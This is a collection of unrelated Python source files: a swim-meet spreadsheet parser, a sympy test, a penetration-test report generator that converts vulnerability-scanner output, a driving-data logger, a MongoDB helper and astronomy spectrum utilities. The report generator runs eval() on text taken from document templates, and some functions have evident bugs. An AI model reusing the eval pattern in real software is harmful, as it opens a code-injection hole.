"""Header lists for the `csv.DictReader` when reading Hytek-produced CSVs.""" import xlrd from hytek_parser._utils import safe_cast from hytek_parser.types import StrOrBytesPath from ._utils import ( ExportXlsParseError, extract_plain_value, extract_time_value, get_first_row_index, get_offsets_from_header, ) from .schemas import EventResultEntry, ParsedEventResultXlsFile __all__ = ["ExportXlsParseError", "parse_event_export_xls"] _ALL_PARSING_ELEMENTS = [ "name", "age", "team", "seed time", "prelim time", "finals time", ] def parse_event_export_xls( file: StrOrBytesPath, parsing_elements: list[str] = _ALL_PARSING_ELEMENTS ) -> ParsedEventResultXlsFile: """Parse a Hytek MeetManager .hy3 file. Args: file (StrOrBytesPath): A path to the file to parse. parsing_elements (Sequence[str]): Elements to extract from the file. Valid elements: 'name', 'age', 'team', 'seed time', 'prelim time', 'finals time' Returns: ParsedEventHyvFile: The parsed file. """ book = xlrd.open_workbook(file) sheet = book.sheet_by_index(0) # Get event name event_name = str(sheet.cell_value(1, 0)) # Extract the header row # This should be one with "Name" as it's first element for rx in range(sheet.nrows): row = sheet.row(rx) if str(row[0].value).lower() == "name": header_row = [str(e.value).lower() for e in row] header_row_index = rx break # Make sure we have a header row if header_row is None: raise ExportXlsParseError("Could not find header row.") first_row_index = get_first_row_index(sheet, header_row_index) # Only parse times in the header row if "seed time" in parsing_elements and "seed time" not in header_row: parsing_elements.pop(parsing_elements.index("seed time")) if "prelim time" in parsing_elements and "prelim time" not in header_row: parsing_elements.pop(parsing_elements.index("prelim time")) if "finals time" in parsing_elements and "finals time" not in header_row: parsing_elements.pop(parsing_elements.index("finals time")) # Determine offsets to extract from offsets = get_offsets_from_header( sheet, header_row, first_row_index, parsing_elements ) # Start parsing rows results = [] rx = first_row_index while rx < sheet.nrows and sheet.cell_value(rx, 0).strip() != "": row = sheet.row(rx) place = safe_cast(int, row[0].value, -1) if place == -1 and row[0].value != "---": rx += 1 continue name = extract_plain_value("name", row, offsets) age = extract_plain_value("age", row, offsets, cast_to=int) team = extract_plain_value("team", row, offsets) seed_time, seed_time_extra, seed_time_qualifications = extract_time_value( "seed time", row, offsets ) prelim_time, prelim_time_extra, prelim_time_qualifications = extract_time_value( "prelim time", row, offsets ) finals_time, finals_time_extra, finals_time_qualifications = extract_time_value( "finals time", row, offsets ) results.append( EventResultEntry( place=place, swimmer_name=name, swimmer_age=age, swimmer_team=team, seed_time=seed_time, seed_time_extra=seed_time_extra, seed_time_qualifications=seed_time_qualifications, prelim_time=prelim_time, prelim_time_extra=prelim_time_extra, prelim_time_qualifications=prelim_time_qualifications, finals_time=finals_time, finals_time_extra=finals_time_extra, finals_time_qualifications=finals_time_qualifications, ) ) rx += 1 return ParsedEventResultXlsFile( event_name=event_name, parsing_elements=tuple(parsing_elements), results=results )
3.0625
3
part_a/test.py
cconnerolson/aerospace_assignment_6
1
12789738
<reponame>cconnerolson/aerospace_assignment_6<gh_stars>1-10 from sympy import * # fn = A_eq() g_s = Symbol('g_s') g_e = Symbol('g_e') M_e = Symbol('M_e') A_r = Symbol('A_r') e1 = sqrt(g_s / g_e) e2 = 1 / M_e e3 = (1 + ((g_e - 1) / 2) * M_e**2)**((g_e + 1) / (2 * (g_e - 1))) e4 = ((g_s + 1) / 2)**((g_s + 1) / (2 * (g_s - 1))) fn = (e1 * e2 * e3) / e4 - A_r print(fn) fn = fn.subs([(g_s, 1.1758101459676122), (g_e, 1.2), (A_r, 1000.)]) print(fn) x = nsolve(fn, 10) print(x)
2.359375
2
core/reportlib.py
shad0w008/Scanver
22
12789739
#!/usr/bin/env python # encoding=utf-8 #codeby 道长且阻 #email @ydhcui/QQ664284092 from lib.docxtpl import DocxTemplate,InlineImage,RichText from lib.docx import Document from lib.docx.shared import Mm, Inches, Pt from lib.jinja2 import Environment import time import re import uuid import csv import base64 import io import urllib.parse as urlparse class ReportGenerate(object): def __init__(self, context, template,clear=True): self.doc = DocxTemplate(template) jinja_env = Environment() if clear: context['buglist'] = self.bugs_clear(context['buglist']) jinja_env.filters['eval'] = lambda x:eval(x,context) self.doc.render(context,jinja_env) def save(self, path): self.doc.save(path) return path def parse_xml(self, value): result = [] texts = re.findall("&lt;p&gt;(.*?)&lt;/p&gt;",value) for text in texts: img = re.findall(r'&lt;img src="data:image.*?;base64,(.*?)"',text) if img: img = io.BytesIO(base64.b64decode(img[0])) img_obj = InlineImage(self.doc, img, width=Mm(170)) result.append(img_obj) else: rt_obj = text#RichText(text) result.append(rt_obj) return result def del_tag(self, s, tag): s = re.sub(r'&lt;{0}.*?&gt;(.*?)&lt;/{0}&gt;'.format(tag), '', s) s = re.sub(r'&lt;{0}.*?&gt;'.format(tag), '', s) return s def bugs_clear(self, bugs, clear_keys=['bugreq'], filter_tags=['br']): for i, bug in enumerate(bugs, 1): bug['num'] = str(i) for key, value in bug.items(): if key in clear_keys: if not value.startswith('&lt;p&gt;'): value = '&lt;p&gt;%s&lt;/p&gt;'%value for tag in filter_tags: value = self.del_tag(value, tag) bug[key] = self.parse_xml(value) return bugs class ReportGenerateDoc(object): def __init__(self, template, **args): dirs = dir(self) for k, v in args.items(): if k not in dirs: setattr(self, k, v) else: print('[!] already exist key: '+ k) self.doc = Document(template) self.re_cmd = re.compile(r'{%(.*?)%}') self.re_bug = re.compile(r'{{(.*?)}}') self.bug_block_start = '<%bugblock_start%>' self.bug_block_end = '<%bugblock_end%>' self.picture_width = 5800000 self.fill_info() def replace_cmd(self, obj): cmds = self.re_cmd.findall(obj.text) for cmd in cmds: try: result = str(eval(cmd.lower(), {'self':self})) obj.text = obj.text.replace('{%%%s%%}'%cmd, result) except: msg = '[!][{%%%s%%}] Invalid cmd in: %s' print(msg % (cmd, obj.text)) def fill_info(self): for para in self.doc.paragraphs: self.pi = para self.replace_cmd(para) for tab in self.doc.tables: lineno = 0 while True: cells = tab.row_cells(lineno) if not cells: break for cell in cells: for para in cell.paragraphs: self.replace_cmd(para) lineno += 1 def insert_picture_from(self, content): if content: flag = 'One who wants to wear the crown, Bears the crown. --- L-codes' self.pi.insert_paragraph_before(flag) for p in self.doc.paragraphs: if flag == p.text: flag_p = p break flag_p.clear() flag_p.add_run('') f = io.BytesIO(base64.b64decode(content)) #with open(settings.UPLOADPATH +'/'+ fid, 'rb') as f: flag_p.runs[-1].add_picture(f, width=self.picture_width) def add_remain_bugs(self, bugs): for bug in bugs: for text, sty in self.bug_template: keys = self.re_bug.findall(text) islist_not_insert = False for key in keys: result = bug.get(key,key) if isinstance(result, list): islist_not_insert = True for tp, data in result: if tp == 'text': self.pi.insert_paragraph_before(data) elif tp == 'img': self.insert_picture_from(data) else: text = text.replace('{{%s}}'%key, result) if not islist_not_insert: self.pi.insert_paragraph_before(text, style=sty) def add_bugs(self, bugs): if not bugs: print('[!] bugs is empty') return None is_bugblock = False self.bug_template = [] bug, bugs = bugs[0], bugs[1:] for para in self.doc.paragraphs: self.pi = para if self.bug_block_end in para.text: is_bugblock = False para.clear() break if is_bugblock: self.bug_template.append((para.text, para.style)) keys = self.re_bug.findall(para.text) for key in keys: result = bug.get(key, key) if isinstance(result, list): for tp, data in result: if tp == 'text': para.insert_paragraph_before(data) elif tp == 'img': self.insert_picture_from(data) self.pi.clear() else: para.text = para.text.replace('{{%s}}'%key, result) if self.bug_block_start in para.text: is_bugblock = True para.clear() self.add_remain_bugs(bugs) def save(self, path=None): path = path or '%s-pentestreport.docx' % self.projectname self.doc.save(path) return path @staticmethod def bugs_clear(bugs, clear_keys=['bugreq'], filter_tags=['br']): def parse_xml(value): result = [] text = re.compile(r'<p>(.*?)</p>') #image = re.compile(r'<img src="\./upload\.php\?fid=([a-z\d]{8}(?:-[a-z\d]{4}){3}-[a-z\d]{12})"') image = re.compile(r'<img src="data:.*?;base64,(.*?)"') for s in text.finditer(value): img = image.search(s[0]) if img: result.append(['img', img[1]]) else: result.append(['text', s[1]]) return result def del_tag(s, tag): s = re.sub(r'<{0}.*?>(.*?)</{0}>'.format(tag), '', s) s = re.sub(r'<{0}.*?>'.format(tag), '', s) return s for i, bug in enumerate(bugs, 1): bug['num'] = str(i) for key, value in bug.items(): if key in clear_keys: for tag in filter_tags: value = del_tag(value, tag) bug[key] = parse_xml(value) return bugs class ReportParse(object): def __init__(self): self.steam = None self.content = b'' self.text = '' self.buglist = [] #漏洞示例 buginfo = { 'bugaddr' :'', #漏洞地址 (必须,可以是url地址或者某个IP地址对应端口如 http://127.0.0.1/bugaddr?id=1或 127.0.0.1:1433 'bugreq' :'', #原始请求包 (没有填空, 'bugres' :'', #原始返回结果 (没有填空, 'bugtag' :'', #漏洞标签 (没有填空,以|分隔,如 SQL|XSS|弱口令 'bugnote' :'', #漏洞备注 (没有填空, 'bugname' :'', #漏洞名称 (必须 'bugrank' :'', #漏洞等级 (必须,分四个等级【紧急,高危,中危,低危】 如果不是这个名称要进行相应转换 'bugowasp' :'', #owasp对应关系 (没有填空 'bugnumber' :'', #漏洞编号 (没有填空,以|分隔,如 CVE-2017-12345|CNVD-2017-12345|CWE-17 'bugdesc' :'', #漏洞描述 (没有填空, 'bugplan' :'', #修复建议 (没有填空, } @classmethod def raw_html(self,html): dr = re.compile(r'<[^>]+>',re.S) html = dr.sub('',html) html = html.replace('\n','') html = html.replace('&#34;','\'') html = html.replace('&#39;','"') html = html.replace('&lt;','<') html = html.replace('&gt;','>') html = html.replace('\\r\\n','') html = html.replace('\\','') return html.strip() def output(self): t = self.buglist self.buglist = [] return t def load(self,filepath,act= None): with open(filepath,'rb') as self.steam: self.content = self.steam.read() self.text = str(self.content) self.filepath = filepath if act: getattr(self,'handler_%s'%act)() else: #找到报告的唯一标识,并由此判断报告格式 contentstr = str(self.content) if 'oOarNtAtTUO9U5IbGM8cQ0Kh0e0TqgAATRQGQTU' in contentstr: self.handler_topsec_html() #天融信html报告 elif '37t3jD3v37l2ySYy5fft2JJ6vRxHueOTIEZwUeVVQUDBnzhz6duPGjXSokJAQqkeGFkyE3EE9r2fPnmRAnDj' in contentstr: self.handler_awvs_html_developer() elif 'GCPyoV4EKz927BjVDBgwoLq6mj8vCb9Ebt682Yh' in contentstr: self.handler_awvs_html() #awvs html报告 elif 'jumpToHash(event.target.hash);' in contentstr: self.handler_nsfocus_html() #绿盟html报告 elif '<title>Nessus Scan Report</title>' in contentstr: self.handler_nessus_html() elif 'Plugin Output' in contentstr: self.handler_nessus_csv() def handler_topsec_html(self): '''根据天融信漏洞扫描器html格式详细报告进行转换''' html_content = str(self.content,encoding='utf-8') addr = re.findall("IP/域名:(.*?)<",html_content) name = re.findall("='>(.*?)</a><td class='numLinkLow'>",html_content) desc = re.findall("<tr><td width='20%'>描述</td><td width='80%' >(.*?)</td></tr>",html_content) plan = re.findall("<tr><td width='20%'>解决办法</td><td width='80%' >(.*?)</td></tr>",html_content) cve = re.findall("<tr><td width='20%'>CVE</td><td width='80%' >(.*?)<",html_content) cnvd = re.findall("<tr><td width='20%'>CNVD</td><td width='80%' >(.*?)<",html_content) cnnvd= re.findall("<tr><td width='20%'>CNNVD</td><td width='80%' >(.*?)<",html_content) rank = re.findall("<tr><td width='20%'>风险级别</td><td width='80%'>(.*?)<",html_content) for i in range(len(name)): rank = rank[i].replace('低风险', '低危') \ .replace('中风险', '中危') \ .replace('高风险', '高危') \ .replace('紧急风险', '紧急') self.buglist.append({ 'bugaddr' : addr[0], 'bugname' : name[i], 'bugrank' : rank, 'bugnumber' : '|'.join([cve[i],cnvd[i],cnnvd[i]]), 'bugdesc' : self.raw_html(desc[i]), 'bugplan' : self.raw_html(plan[i]), }) def handler_nsfocus_html(self): '''根据绿盟扫描器html格式漏洞报告进行转换''' data = str(self.content,encoding='utf-8') host = re.findall('<td>(.*?)</td>',data)[0] a = re.findall(r'''<tr class="(odd|even)" data-id=".*?" data-port="(.*?)" >([\s\S]*?)</table>''',data) for _,port,data in a: vuls = re.findall('''/><span class="level_danger_(.*?)" style="cursor:pointer">(.*?)</span>''',data) desc = ''.join(re.findall('''<th width="100">详细描述</th>([\s\S]*?)</tr>''',data)) plan = ''.join(re.findall('''<th width="100">解决办法</th>([\s\S]*?)</tr>''',data)) cve = ''.join(re.findall(r'''http://cve.mitre.org/cgi-bin/cvename.cgi?name=(.*?)">''',data)) cnnvd= ''.join(re.findall(r'''http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/(.*?)">''',data)) cnvd = ''.join(re.findall(r'''http://www.cnvd.org.cn/flaw/show/(.*?)">''',data)) rank = vuls[0][0].replace('high', '高危') \ .replace('middle', '中危') \ .replace('low', '低危') self.buglist.append({ 'bugaddr' : '%s:%s'%(host,port), 'bugname' : vuls[0][1], 'bugrank' : rank, 'bugnumber' : '|'.join([cve,cnvd,cnnvd]), 'bugdesc' : self.raw_html(desc), 'bugplan' : self.raw_html(plan), }) def handler_awvs_html(self): '''根据Awvs扫描器html格式Affected Items漏洞报告进行转换''' html = self.text starturl = re.findall("Start url</td>.*?<td>(.*?)</td>",html,re.DOTALL)[0] addr = re.findall('//(.*?)/',starturl)[0] name = re.findall("<td><b>Alert group</b></td>.*?<td><b>(.*?)</b>",html,re.DOTALL) rank = re.findall("<td>Severity</td>.*?<td>(.*?)</td>",html,re.DOTALL) desc = re.findall("<td>Description</td>.*?<td>(.*?)</td>",html,re.DOTALL) plan = re.findall("<td>Recommendations</td>.*?<td>(.*?)</td>",html,re.DOTALL) for i in range(len(name)): rank = rank[i].replace('Low', '低危') \ .replace('Medium','中危') \ .replace('High', '高危') \ .replace('Crital','紧急') self.buglist.append({ 'bugaddr' : addr, 'bugname' : name[i], 'bugrank' : rank, 'bugnumber' : '', 'bugdesc' : self.raw_html(desc[i]), 'bugplan' : self.raw_html(plan[i]), }) def handler_awvs_html_developer(self): '''Developer Report''' html = self.text surl = re.findall("Start url</td>.*?<td>(.*?)</td>",html,re.DOTALL)[0] ip = re.findall('//(.*?)/',surl)[0] rel = re.findall("\"ax-section-title ax-section-title--big\">.*?<img src=\"data:image/png;base64,.*?\">(.*?)</h3>.*?<td class=\"ax-alert-info__severity_value\">(.*?)</td>.*?<h4 class=\"ax-section-title\">.*?Description.*?</h4>.*?<p>(.*?)</p>.*?<h4 class=\"ax-section-title\">.*?Impact.*?</h4>.*?<p>(.*?)</p>.*?<h4 class=\"ax-section-title\">.*?Affected items.*?</h4>(.*?)<h3 class=",html,re.DOTALL) for name,rank,desc,plan,items in rel: reitem = re.findall("<b>(.*?)</b></td></tr>.*?<tr><td><code style=\"white-space: pre-line\">(.*?)</code></td></tr>",items,re.DOTALL) for addr,req in reitem: rank = rank.replace('Informational','低危').replace('Low','低危').replace('Medium','中危').replace('High','高危').replace('Crital','紧急') self.buglist.append({ 'bugaddr' : 'http://'+ip+req.split()[1], 'bugname' : self.raw_html(name), 'bugrank' : self.raw_html(rank), 'bugnumber' : '', 'bugdesc' : self.raw_html(desc), 'bugplan' : self.raw_html(plan), 'bugreq' : req }) def handler_nessus_csv(self): '''根据Nessus扫描器csv格式漏洞报告进行转换''' i=0 for row in csv.DictReader(self.steam): field[i] = row bug = {} bug['bugaddr'] = field[i]['Host'] bug['bugname'] = field[i]['Name'] bug['bugrank'] = field[i]['Risk'].replace('Low','低危') \ .replace('Medium','中危') \ .replace('High','高危') \ .replace('Crital','紧急') bug['bugnumber']= field[i]['CVE'] bug['bugdesc'] = field[i]['Description'] bug['bugplan'] = field[i]['Solution'] bug['bugnote'] = field[i]['See Also'] self.buglist.append(bug) i += 1 def handler_topsec_xls(self): '''根据天融信漏洞扫描器xls格式漏洞报告进行转换''' table = self.steam.sheets()[0] ip = table.row_values(1)[0] nrows = table.nrows for i in range(nrows): if i ==0: continue ip_temp = table.row_values(i)[1] \ .replace('低风险', '低危') \ .replace('中风险', '中危') \ .replace('高风险', '高危') \ .replace('紧急风险','紧急') self.buglist.append({ 'bugaddr' : table.row_values(i)[0], 'bugname' : table.row_values(i)[3], 'bugrank' : ip_temp, 'bugdesc' : table.row_values(i)[7], 'bugplan' : table.row_values(i)[8], 'bugnote' : table.row_values(i)[5] }) def handler_nessus_html(self): '''根据Nessus扫描器html格式漏洞报告进行转换''' html = str(self.content,encoding='utf-8') detaillist = re.findall('<h2 xmlns="" class="classsection" .*?>(.*?)<h2 xmlns="" class="classsection" .*?>',html.replace('\n','').replace('\r\n',''),re.S) for d in detaillist: bugaddr = re.findall(r'(?<![\.\d])(?:\d{1,3}\.){3}\d{1,3}(?![\.\d])',d)[0] bugs_raw = re.findall('Name</span></td></tr><tr>(.*?)</table>',d) for b in bugs_raw: ranks = re.findall('important;">(.*?)</span>',b) names = re.findall('normal;">(.*?)</span>',b) for i in range(len(ranks)): if ranks[i] != "Info": rank_single = ranks[i].replace('Low','低危') \ .replace('Medium','中危') \ .replace('High','高危') \ .replace('Crital','紧急').split()[0] name_single = names[i] self.buglist.append({ 'bugaddr' :bugaddr, #漏洞地址 (必须,可以是url地址或者某个IP地址对应端口如 http://127.0.0.1/bugaddr?id=1或 127.0.0.1:1433 'bugname' :name_single, #漏洞名称 (必须 'bugrank' :rank_single, #漏洞等级 (必须,分四个等级【紧急,高危,中危,低危】 如果不是这个名称要进行相应转换 }) def handler_nessus_csv(self): '''根据Nessus扫描器csv格式漏洞报告进行转换''' with open(self.filepath) as f: for row in csv.reader(f): line = row bug = {} bug['bugaddr'] = line[4] bug['bugname'] = line[7] bug['bugrank'] = line[3].replace('Low','低危') \ .replace('Medium','中危') \ .replace('High','高危') \ .replace('Crital','紧急') bug['bugnumber'] = line[1] bug['bugdesc'] = line[9] bug['bugplan'] = line[10] bug['bugnote'] = line[11] if bug['bugrank'] != "None": self.buglist.append(bug)
2.4375
2
data.py
Jeeprr/selfdriving-raspi
2
12789740
<filename>data.py<gh_stars>1-10 import pandas as pd import os import cv2 import numpy as np from datetime import datetime import webcam as W import controller as cntrl global imgList, steeringList countFolder = 0 count = 0 imgList = [] steeringList = [] #GET CURRENT DIRECTORY PATH myDirectory = os.path.join(os.getcwd(), 'DataCollected') # print(myDirectory) # CREATE A NEW FOLDER BASED ON THE PREVIOUS FOLDER COUNT while os.path.exists(os.path.join(myDirectory,f'IMG{str(countFolder)}')): countFolder += 1 newPath = myDirectory +"/IMG"+str(countFolder) os.makedirs(newPath) # SAVE IMAGES IN THE FOLDER def saveData(img,steering): global imgList, steeringList now = datetime.now() timestamp = str(datetime.timestamp(now)).replace('.', '') #print("timestamp =", timestamp) fileName = os.path.join(newPath,f'Image_{timestamp}.jpg') cv2.imwrite(fileName, img) imgList.append(fileName) steeringList.append(steering) # SAVE LOG FILE WHEN THE SESSION ENDS def saveLog(): global imgList, steeringList rawData = {'Image': imgList, 'Steering': steeringList} df = pd.DataFrame(rawData) df.to_csv(os.path.join(myDirectory,f'log_{str(countFolder)}.csv'), index=False, header=False) print('Log Saved') print('Total Images: ',len(imgList)) def data(st): img = W.getcam() saveData(img,st) saveLog()
2.53125
3
app/models/base_queries.py
travelteker/flask_api
0
12789741
<reponame>travelteker/flask_api<filename>app/models/base_queries.py from typing import Any, Optional, Union from pymongo.cursor import Cursor class BaseQueries: """Class to centralize commons method to manipulate database mongo""" def __init__(self, collection: Any): self.__collection = collection def find_one(self, query: dict, options: Optional[dict] = None) -> Union[None, dict, Cursor]: if options is None: options = {} return self.__collection.find_one(query, options) def find(self, query: dict, options: Optional[dict] = None) -> Union[None, dict, Cursor]: if options is None: options = {} return self.__collection.find(query, options) def delete_one(self, query: dict, options: Optional[dict] = None): if options is None: options = {} return self.__collection.delete_one(query, options)
2.578125
3
astro_tools.py
ellawang44/astro_tools
0
12789742
import numpy as np from scipy.stats.mstats import theilslopes from scipy.interpolate import CubicSpline import matplotlib.pyplot as plt # define constants _c = 299792.458 # speed of light in km s^-1 class SpecAnalysis: '''Analyse astronomy spectra. ''' def __init__(self, wavelength, flux, flux_err=None): ''' Parameters ---------- wavelength : List[Real] or 1darray Input wavelengths. Needs to be monotonically increasing. flux : List[Real] or 1darray Input flux profile. flux_err : List[Real] or 1darray, optional Input flux error. If None, then set to array of 0. ''' # if no error, then set error to 0 if flux_err is None: flux_err = np.full(len(flux), 0) # change to numpy array try: self.wl = np.array(wavelength, dtype=float) self.flux = np.array(flux, dtype=float) self.flux_err = np.array(flux_err, dtype=float) except: raise ValueError('Could not turn input into numpy arrays.') # check monotonic increasing wavelength if not ((self.wl[1:] - self.wl[:-1]) > 0).all(): raise ValueError('Wavelength needs to be strictly increasing') # check length of all input equal if not len(self.wl) == len(self.flux) == len(self.flux_err): raise ValueError( 'wavelength, flux, flux_err are not the same length') def save(self, wavelength, flux, flux_err=None): '''Save the values given into the class. Parameters ---------- wavelength : List[Real] or 1darray Input wavelengths. Needs to be monotonically increasing. flux : List[Real] or 1darray Input flux profile. flux_err : List[Real] or 1darray, optional Input flux error. If None, then set to array 0. ''' # if no error, then set error to 0 if flux_err is None: flux_err = np.full(len(flux), 0) self.wl = wavelength self.flux = flux self.flux_err = flux_err def mask_region(self, masks, rm='out'): '''Mask (remove) a region of the spectrum. Parameters ---------- masks : list of lists[float] The regions which you want to mask. rm : str, optional To remove the region in the mask or out. Accepted values: 'in' and 'out'. Returns ------- wl, flux, flux_err : 3darray Masked wavelength, flux, and flux error. ''' # make mask mask_full = np.zeros(len(self.wl), dtype=bool) for lower, upper in masks: mask = (lower <= self.wl) & (self.wl <= upper) mask_full = mask_full | mask # flip if masking inside if rm == 'in': mask_full = ~mask_full # apply mask self.save( self.wl[mask_full], self.flux[mask_full], self.flux_err[mask_full] ) return self.wl, self.flux, self.flux_err def cut(self, center, upper=10, lower=10, domain='wl'): '''Cuts the wavelength, flux, and flux error and returns the values between center - lower and center + upper. Parameters ---------- center : Real The center of the wavelengths where the cut should be taken, in the same units as the wavelength. upper : Positive Real, optional The amount to go above the center when taking the cut, in the same units of nm if rtype=wl, or in km/s if rtype=vr. lower : Positive Real, optional The amount to go below the center when taking the cut, in the same units of nm if rtype=wl, or in km/s if rtype=vr. domain : str, optional The domain upper and lower is in. Either wl or vr (wavelength, radial velocity respectively). Returns ------- wl, flux, flux_err : 3darray Cut wavelength, flux, and flux error. ''' # convert to wavelength if domain == 'vr': lower = vr_to_wl(lower, center=center) upper = vr_to_wl(upper, center=center) # cut low = center - lower high = center + upper self.mask_region([[low, high]]) return self.wl, self.flux, self.flux_err def sigma_clip(self, func, args=(), sigma_cut=3, iterations=1): '''Clip outliers based on a sigma cut. Parameters ---------- func : callable ``func(self.wl, self.flux, self.flux_err, *args)``. The function to fit the spectrum to. args : tuple, optional Extra arguments passed to func, i.e., ``func(self.wl, self.flux, self.flux_err, *args)``. sigma_cut : float The tolerance on sigma clip. iterations : int The number of times to iterate the sigma clip. Returns ------- wl, flux, flux_err : 3darray Clipped wavelength, flux, and flux error. ''' for _ in range(iterations): flux_fit = func(self.wl, self.flux, self.flux_err, *args) diff = self.flux - flux_fit sigma = np.std(diff) mask = np.abs(diff) < sigma*sigma_cut self.save(self.wl[mask], self.flux[mask], self.flux_err[mask]) return self.wl, self.flux, self.flux_err def cont_norm(self, center, mask_step=0.01, sigma_cut=3, iterations=3): '''Normalise the continuum. Assumes you're normalising a line profile. 1. Do basic normalisation. 2. Sigma clip lines and outliers. 3. Fit theilslope on the clipped spectrum. 4. Remove fit from line. Only works for a small region with linear continuum. Parameters ---------- center : float The center of the line. mask_step : float Width/2 of the line. sigma_cut : float The tolerance on sigma clip. iterations : int The number of times to iterate the sigma clip. Returns ------- wl, flux, flux_err : 3darray Normalised wavelength, flux, and flux error. ''' # save original values wl = self.wl flux = self.flux flux_err = self.flux_err # first do a shitty normalisation with the main line removed masks = [[center - mask_step, center + mask_step]] self.mask_region(masks, rm='in') med = np.median(self.flux) flux = flux/med flux_err = flux_err/med # sigma clip self.save(wl, flux, flux_err) median = lambda x,y,z:np.median(y) self.sigma_clip(median, sigma_cut=sigma_cut, iterations=iterations) # fit fit = theilslopes(self.flux, self.wl) grad = fit[0] intercept = fit[1] # remove linear slope fit = wl*grad + intercept flux = flux/fit flux_err = flux_err/fit self.save(wl, flux, flux_err) return self.wl, self.flux, self.flux_err def gaussian_broaden(center, sigma=0, num=None): '''Only works for synthetic spectra because it uses cubicspline. Might be unpredictable for synthetic spectra with more than 1 line or gaps. TODO: investigate behaviour on harder to deal with synthetic spectra. ''' # convert to velocity space vr = wl_to_v(self.wl, center=center) cs = CubicSpline(vr, self.flux) # set steps if num is None: num = int((vr[-1] - vr[0]) / np.min(vr[1:] - vr[:-1])) + 1 num *= 2 # set kernel g_gen = scipy.stats.norm(0, sigma/2.35482) # convert FWHM to sigma # convolve tau = np.linspace(vr[0], vr[-1], num) convolver = np.array([g_gen.pdf(t) for t in tau]) convolver /= np.sum(convolver) integrand = [cs(vr - t)*convolver[i] for i, t in enumerate(tau)] flux_conv = np.sum(integrand, axis = 0) self.flux = flux_conv return self.wl, self.flux def polyfit(x, y, x_out=None, deg=1): '''Fits a polynomial to input data after shifting data to 0. Parameters ---------- x : List[Real] or 1darray x values to fit over. y : List[Real] or 1darray y values to fit over. x_out : List[Real] or None Output x values. If None, then return the fit. deg : Int, optional Degree of fitted polynomial. 1 by default. Returns ------- y_out or center, fit: 1darray or tuple(float) Output y values at the input x_out values or x mean, grad, intercept. ''' # convert to numpy arrays x = np.array(x) y = np.array(y) # fit center_x = np.mean(x) fit = np.polyfit(x - center_x, y, deg=deg) # return fit and center if x_out is None: return center_x, fit[0], fit[1] # return y evaluated at x_out y_out = np.polyval(fit, x_out - center_x) return y_out def cut_wavelength(wavelength, center=670.9659, upper=10, lower=10): """Cuts the wavelength returns the values between center - lower and center + upper. Useful for plotting mostly because many functions return a cut line profile but not cut wavelength. Parameters ---------- wavelength : List[Real] or 1darray Input wavelengths. Needs to be monotonically increasing. center : Real, optional The center of the wavelengths where the cut should be taken, in the same units as the wavelength. upper : Positive Real, optional The amount to go above the center when taking the cut, in the same units as the wavelength. lower : Positive Real, optional The amount to go below the center when taking the cut, in the same units as the wavelength. Returns ------- wl_cut : 2darray Cut wavelengths. """ wavelength = np.array(wavelength) low = center - lower high = center + upper wl_cut = wavelength[(low <= wavelength) & (high >= wavelength)] return wl_cut def wl_to_vr(wl, center=670.9659): '''Converts wavelengths to radial velocity, works for errors too. Parameters ---------- wl : float or ndarray Wavelength to be converted, in nm. center : float The wavelength that vr=0 is at. Returns ------- vr : float or ndarray Radial velocity in km/s. ''' if isinstance(wl, float): return wl*_c/center else: return np.array(wl)*_c/center def vr_to_wl(vr, center=670.9659): '''Converts wavelengths to radial velocity, works for errors too. Parameters ---------- vr : float or ndarray Radial velocity to be converted, in km/s. center : float The wavelength that vr=0 is at. Returns ------- wl : float or ndarray Wavelengths in nm. ''' if isinstance(vr, float): return vr*center/_c else: return np.array(vr)*center/_c def vac_to_air(lam): '''Convert from vacuum to air wavelengths. From https://www.astro.uu.se/valdwiki/Air-to-vacuum%20conversion Parameters ---------- lam : float or ndarray Wavelengths in vacuum in angstroms. Returns ------- air : float or ndarray Wavelengths in air in angstroms. ''' s = 1e4/lam n = 1 + 0.0000834254 + 0.02406147 / (130 - s**2) + 0.00015998 / (38.9 - s**2) return lam/n def air_to_vac(lam): '''Convert from air to vacuum wavelengths. From https://www.astro.uu.se/valdwiki/Air-to-vacuum%20conversion Parameters ---------- lam : float or ndarray Wavelengths in air in angstroms. Returns ------- vac : float or ndarray Wavelengths in vacuum in angstroms. ''' s = 1e4/lam n = 1 + 0.00008336624212083 + 0.02408926869968 / (130.1065924522 - s**2) + 0.0001599740894897 / (38.92568793293 - s**2) return lam*n def convolve(f, g, n, m): '''Compute the discrete convolution. Parameters ---------- f : Function Function 1. g : Function Function 2. n : 1darray Shift applied to g. m : 1darray Discrete values at which the function is evaluated. Returns ------- conv : float Discrete convolution at n f*g(n). ''' m_shift = m + n.reshape(n.shape[0], -1) # m+n return np.sum(f(m)*g(m_shift), axis=1) def common_range(x_range, shifts): '''Compute the common range shared after the shifts are applied. Parameters ---------- x_range : Tuple(Float) The range over which the functions are defined. shifts : List[Float] The shifts to apply to the functions. Returns ------- left, right : Float, Float The shared range (left, right). ''' min_shift = np.min(shifts) max_shift = np.max(shifts) left = max(x_range[0], x_range[0] - min_shift) right = min(x_range[1], x_range[1] - max_shift) if left == right: raise ValueError('Shifts are too extreme given the x_range, there is no overlap.') return left, right def cross_correlate(f, g, x_range, shifts, num=10000, plot=False): '''Compute the cross correlation between two functions. Truncates edges, no extrapolation. Parameters ---------- f : Function Function 1. g : Function Function 2. x_range : tuple(Float) The common range that f and g are defined over. i.e. f : [-2, 2] -> R g : [-1, 3] -> R Then x_range = (-1, 2) shifts : 1darray The shifts to apply to the function g. num : int The number of points to sample the function f and g. plot : bool Display plots for debugging. Returns ------- cc : List[Float] The cross correlations of the given shifts. ''' #TODO: x_range could be improved to take into account differences in range # of f and g, this doesn't happen a lot in practice though left, right = common_range(x_range, shifts) m = np.linspace(left, right, num=num) if plot: # original functions x = np.linspace(x_range[0], x_range[1], 1000) plt.scatter(x, f(x), label='f', s=4, alpha=0.5) plt.scatter(x, g(x), label='g', s=4, alpha=0.5) # shift g plt.scatter(m, g(m+np.max(shifts)), s=4, alpha=0.5, label=f'g min={np.min(shifts):.2f} shift') plt.scatter(m, g(m+np.min(shifts)), s=4, alpha=0.5, label=f'g max={np.max(shifts):.2f} shift') # common region for line in [left, right]: plt.axvline(line, color='black', linestyle='--') plt.legend() plt.show() return convolve(f, g, shifts, m) def radial_velocity(f, g, x_range, shifts, num=10000, plot=False): '''Compute the radial velocity from the max cross correlation. f and g must have continuum centered at 0. f(n) = g(n-rv) Parameters ---------- f : Function Function 1. g : Function Function 2. x_range : tuple(Float) The common range that f and g are defined over. i.e. f : [-2, 2] -> R g : [-1, 3] -> R Then x_range = (-1, 2) shifts : 1darray The shifts to apply to the function g. num : int The number of points to 